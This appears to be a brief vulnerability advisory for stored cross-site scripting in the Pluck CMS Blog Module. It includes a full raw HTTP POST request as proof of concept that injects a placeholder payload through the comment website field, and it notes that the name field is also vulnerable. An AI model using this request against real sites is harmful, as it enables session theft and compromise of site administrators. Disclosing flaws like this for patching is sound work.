Pluck CMS allows website owners to add blogs to their website through the Blog Module. The Blog Module enables commenting by default which enables this attack easily. This vulnerability will allow an attacker to inject arbitrary web script or HTML into the admin panel and blog Reaction Comments. Proof of concept: POST /pluck/?file=yourpost&module=blog&page=yourpost&post=yourpostHTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Cookie: PHPSESSID=60p765gnl6o3b9emgvqng0f5o4 Connection: close Upgrade-Insecure-Requests: 1 blog_reaction_name=Test&blog_reaction_email=test%40att.lol&blog_reaction_website=http%3A%2F%2Fpluck.com/?XSSPAYLOAD&blog_reaction_message=test&submit=Send This will fire in the page and fire in the back end. There's other parameters also vulnerable to xss as well such as the name parameter.